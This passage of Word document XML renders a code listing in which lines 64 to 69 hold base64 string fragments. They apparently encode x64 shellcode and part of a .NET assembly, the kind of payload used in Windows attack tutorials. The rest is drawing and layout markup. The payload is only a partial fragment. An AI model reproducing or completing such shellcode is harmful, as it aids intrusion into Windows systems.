          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>64</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"Xon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>X//Vg/gA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>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65</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"fShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bRB/+dY"</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66</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"agBZScfC8LWiVv/VAAATMAYAZQAAAAEAABEAIP4BAACNBgAAASXQAwAABCgGAAAKChYGj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ml+AQAA"</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67</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"BH4CAAAEKAMAAAYLBhYHbigHAAAKBo5pKAgAAAoAfgkAAAoMFg1+CQAAChMEFhYHEQQWE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gMoBAAA"</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68</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"BgwIFSgFAAAGJisAKkogABAAAIABAAAEH0CAAgAABCpCU0pCAQABAAAAAAAMAAAAdjQuM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C4zMDMx"</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69</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"OQAAAAAFAGwAAABgAgAAI34AAMwCAABIAwAAI1N0cmluZ3MAAAAAFAYAAAgAAAAjVVMAH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AYAABAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,650" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:630" coordorigin="1490,1630" coordsize="8990,630" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1660,10484,1661,10484,1662,10484,1664,10484,1665,10484,1667,10484,1669,10484,1671,10484,1673,10484,1675,10484,1677,10484,1679,10484,1681,10484,1684,10484,1686,10484,1689,10484,1692,10484,1694,10484,1697,10484,1701,10484,1704,10484,1707,10484,1711,10484,1714,10484,1718,10484,1722,10484,1726,10484,1730,10484,1734,10484,1738,10484,1743,10484,1748,10484,1752,10484,1757,10484,1762,10484,1768,10484,1773,10484,1779,10484,1784,10484,1790,10484,1796,10484,1803,10484,1809,10484,1816,10484,1822,10484,1829,10484,1836,10484,1844,10484,1851,10484,1859,10484,1867,10484,1875,10484,1883,10484,1891,10484,1900,10484,1909,10484,1918,10484,1927,10484,1936,10484,1946,10484,1955,10484,1966,10484,1976,10484,1986,10484,1997,10484,2008,10484,2019,10484,2030,10484,2042,10484,2054,10484,2066,10484,2078,10484,2090,10484,2103,10484,2116,10484,2129,10484,2143,10484,2156,10484,2170,10484,2185,10484,2199,10484,2214,10484,2229,10484,2244,10484,2259,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10483,2275,10482,2275,10482,2275,10480,2275,10479,2275,10477,2275,10475,2275,10473,2275,10470,2275,10466,2275,10462,2275,10458,2275,10453,2275,10448,2275,10442,2275,10435,2275,10428,2275,10419,2275,10411,2275,10401,2275,10391,2275,10379,2275,10367,2275,10354,2275,10340,2275,10326,2275,10310,2275,10293,2275,10275,2275,10256,2275,10236,2275,10215,2275,10192,2275,10168,2275,10143,2275,10117,2275,10090,2275,10061,2275,10031,2275,9999,2275,9966,2275,9931,2275,9895,2275,9858,2275,9819,2275,9778,2275,9735,2275,9691,2275,9646,2275,9598,2275,9549,2275,9498,2275,9445,2275,9391,2275,9334,2275,9275,2275,9215,2275,9153,2275,9088,2275,9022,2275,8953,2275,8883,2275,8810,2275,8735,2275,8658,2275,8578,2275,8497,2275,8413,2275,8326,2275,8238,2275,8146,2275,8053,2275,7957,2275,7859,2275,7758,2275,7654,2275,7548,2275,7439,2275,7328,2275,7214,2275,7097,2275,6977,2275,6855,2275,6730,2275,6602,2275,6471,2275,6337,2275,6201,2275,6061,2275,5918,2275,5773,2275,5624,2275,5472,2275,5317,2275,5159,2275,4997,2275,4833,2275,4665,2275,4494,2275,4319,2275,4141,2275,3960,2275,3776,2275,3587,2275,3396,2275,3201,2275,3002,2275,2800,2275,2594,2275,2385,2275,2172,2275,1955,2275,1734,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2274,1510,2274,1510,2274,1510,2274,1510,2274,1510,2273,1510,2273,1510,2273,1510,2272,1510,2272,1510,2271,1510,2271,1510,2270,1510,2269,1510,2269,1510,2268,1510,2267,1510,2266,1510,2265,1510,2264,1510,2263,1510,2262,1510,2260,1510,2259,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2249,1510,2247,1510,2245,1510,2243,1510,2241,1510,2239,1510,2236,1510,2234,1510,2231,1510,2228,1510,2226,1510,2223,1510,2219,1510,2216,1510,2213,1510,2209,1510,2206,1510,2202,1510,2198,1510,2194,1510,2190,1510,2186,1510,2182,1510,2177,1510,2172,1510,2168,1510,2163,1510,2158,1510,2152,1510,2147,1510,2141,1510,2136,1510,2130,1510,2124,1510,2117,1510,2111,1510,2104,1510,2098,1510,2091,1510,2084,1510,2076,1510,2069,1510,2061,1510,2053,1510,2045,1510,2037,1510,2029,1510,2020,1510,2011,1510,2002,1510,1993,1510,1984,1510,1974,1510,1964,1510,1954,1510,1944,1510,1934,1510,1923,1510,1912,1510,1901,1510,1890,1510,1878,1510,1866,1510,1854,1510,1842,1510,1830,1510,1817,1510,1804,1510,1791,1510,1777,1510,1764,1510,1750,1510,1735,1510,1721,1510,1706,1510,1691,1510,1676,1510,1661,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:1630;width:30;height:650" coordorigin="1490,1630" coordsize="30,650" path="m1517,1645l1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1646,1517,1646,1517,1646,1517,1646,1517,1647,1517,1647,1517,1647,1517,1648,1517,1648,1517,1649,1517,1649,1517,1650,1517,1651,1517,1651,1517,1652,1517,1653,1517,1654,1517,1655,1517,1656,1517,1657,1517,1658,1517,1660,1517,1661,1517,1662,1517,1664,1517,1665,1517,1667,1517,1669,1517,1671,1517,1673,1517,1675,1517,1677,1517,1679,1517,1681,1517,1684,1517,1686,1517,1689,1517,1692,1517,1694,1517,1697,1517,1701,1517,1704,1517,1707,1517,1711,1517,1714,1517,1718,1517,1722,1517,1726,1517,1730,1517,1734,1517,1738,1517,1743,1517,1748,1517,1752,1517,1757,1517,1762,1517,1768,1517,1773,1517,1779,1517,1784,1517,1790,1517,1796,1517,1803,1517,1809,1517,1816,1517,1822,1517,1829,1517,1836,1517,1844,1517,1851,1517,1859,1517,1867,1517,1875,1517,1883,1517,1891,1517,1900,1517,1909,1517,1918,1517,1927,1517,1936,1517,1946,1517,1955,1517,1966,1517,1976,1517,1986,1517,1997,1517,2008,1517,2019,1517,2030,1517,2042,1517,2054,1517,2066,1517,2078,1517,2090,1517,2103,1517,2116,1517,2129,1517,2143,1517,2156,1517,2170,1517,2185,1517,2199,1517,2214,1517,2229,1517,2244,1517,2259,1517,2275e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:112.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:670" coordorigin="1490,2250" coordsize="8990,670" path="m1510,2275l1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1511,2275,1512,2275,1512,2275,1514,2275,1515,2275,1517,2275,1519,2275,1521,2275,1524,2275,1528,2275,1532,2275,1536,2275,1541,2275,1546,2275,1552,2275,1559,2275,1566,2275,1575,2275,1583,2275,1593,2275,1603,2275,1615,2275,1627,2275,1640,2275,1654,2275,1668,2275,1684,2275,1701,2275,1719,2275,1738,2275,1758,2275,1780,2275,1802,2275,1826,2275,1851,2275,1877,2275,1904,2275,1933,2275,1963,2275,1995,2275,2028,2275,2063,2275,2099,2275,2136,2275,2175,2275,2216,2275,2259,2275,2303,2275,2348,2275,2396,2275,2445,2275,2496,2275,2549,2275,2604,2275,2660,2275,2719,2275,2779,2275,2841,2275,2906,2275,2972,2275,3041,2275,3112,2275,3184,2275,3259,2275,3336,2275,3416,2275,3498,2275,3582,2275,3668,2275,3757,2275,3848,2275,3941,2275,4037,2275,4136,2275,4236,2275,4340,2275,4446,2275,4555,2275,4666,2275,4780,2275,4897,2275,5017,2275,5139,2275,5264,2275,5392,2275,5523,2275,5657,2275,5793,2275,5933,2275,6076,2275,6222,2275,6370,2275,6522,2275,6677,2275,6835,2275,6997,2275,7161,2275,7329,2275,7500,2275,7675,2275,7853,2275,8034,2275,8219,2275,8407,2275,8598,2275,8793,2275,8992,2275,9194,2275,9400,2275,9609,2275,9823,2275,10039,2275,10260,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2276,10484,2276,10484,2276,10484,2276,10484,2276,10484,2276,10484,2277,10484,2277,10484,2277,10484,2278,10484,2278,10484,2279,10484,2279,10484,2280,10484,2280,10484,2281,10484,2282,10484,2283,10484,2284,10484,2284,10484,2285,10484,2287,10484,2288,10484,2289,10484,2290,10484,2292,10484,2293,10484,2295,10484,2296,10484,2298,10484,2300,10484,2302,10484,2304,10484,2306,10484,2308,10484,2310,10484,2312,10484,2315,10484,2317,10484,2320,10484,2323,10484,2326,10484,2329,10484,2332,10484,2335,10484,2339,10484,2342,10484,2346,10484,2350,10484,2354,10484,2358,10484,2362,10484,2366,10484,2371,10484,2376,10484,2380,10484,2385,10484,2390,10484,2396,10484,2401,10484,2406,10484,2412,10484,2418,10484,2424,10484,2430,10484,2437,10484,2443,10484,2450,10484,2457,10484,2464,10484,2471,10484,2479,10484,2486,10484,2494,10484,2502,10484,2510,10484,2519,10484,2527,10484,2536,10484,2545,10484,2554,10484,2564,10484,2573,10484,2583,10484,2593,10484,2603,10484,2614,10484,2625,10484,2636,10484,2647,10484,2658,10484,2670,10484,2682,10484,2694,10484,2706,10484,2718,10484,2731,10484,2744,10484,2758,10484,2771,10484,2785,10484,2799,10484,2813,10484,2828,10484,2842,10484,2858,10484,2873,10484,2888,10484,2904,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10484,2920,10483,2920,10482,2920,10482,2920,10480,2920,10479,2920,10477,2920,10475,2920,10473,2920,10470,2920,10466,2920,10462,2920,10458,2920,10453,2920,10448,2920,10442,2920,10435,2920,10428,2920,10419,2920,10411,2920,10401,2920,10391,2920,10379,2920,10367,2920,10354,2920,10340,2920,10326,2920,10310,2920,10293,2920,10275,2920,10256,2920,10236,2920,10215,2920,10192,2920,10168,2920,10143,2920,10117,2920,10090,2920,10061,2920,10031,2920,9999,2920,9966,2920,9931,2920,9895,2920,9858,2920,9819,2920,9778,2920,9735,2920,9691,2920,9646,2920,9598,2920,9549,2920,9498,2920,9445,2920,9391,2920,9334,2920,9275,2920,9215,2920,9153,2920,9088,2920,9022,2920,8953,2920,8883,2920,8810,2920,8735,2920,8658,2920,8578,2920,8497,2920,8413,2920,8326,2920,8238,2920,8146,2920,8053,2920,7957,2920,7859,2920,7758,2920,7654,2920,7548,2920,7439,2920,7328,2920,7214,2920,7097,2920,6977,2920,6855,2920,6730,2920,6602,2920,6471,2920,6337,2920,6201,2920,6061,2920,5918,2920,5773,2920,5624,2920,5472,2920,5317,2920,5159,2920,4997,2920,4833,2920,4665,2920,4494,2920,4319,2920,4141,2920,3960,2920,3776,2920,3587,2920,3396,2920,3201,2920,3002,2920,2800,2920,2594,2920,2385,2920,2172,2920,1955,2920,1734,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2920,1510,2919,1510,2919,1510,2919,1510,2919,1510,2918,1510,2918,1510,2917,1510,2917,1510,2916,1510,2916,1510,2915,1510,2914,1510,2914,1510,2913,1510,2912,1510,2911,1510,2910,1510,2909,1510,2908,1510,2907,1510,2905,1510,2904,1510,2903,1510,2901,1510,2899,1510,2898,1510,2896,1510,2894,1510,2892,1510,2890,1510,2888,1510,2886,1510,2883,1510,2881,1510,2878,1510,2875,1510,2873,1510,2870,1510,2867,1510,2863,1510,2860,1510,2857,1510,2853,1510,2850,1510,2846,1510,2842,1510,2838,1510,2834,1510,2829,1510,2825,1510,2820,1510,2815,1510,2810,1510,2805,1510,2800,1510,2795,1510,2789,1510,2783,1510,2778,1510,2771,1510,2765,1510,2759,1510,2752,1510,2746,1510,2739,1510,2732,1510,2724,1510,2717,1510,2709,1510,2702,1510,2693,1510,2685,1510,2677,1510,2668,1510,2660,1510,2651,1510,2641,1510,2632,1510,2622,1510,2612,1510,2602,1510,2592,1510,2582,1510,2571,1510,2560,1510,2549,1510,2538,1510,2526,1510,2514,1510,2502,1510,2490,1510,2477,1510,2464,1510,2451,1510,2438,1510,2425,1510,2411,1510,2397,1510,2382,1510,2368,1510,2353,1510,2338,1510,2323,1510,2307,1510,2291,1510,2275e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
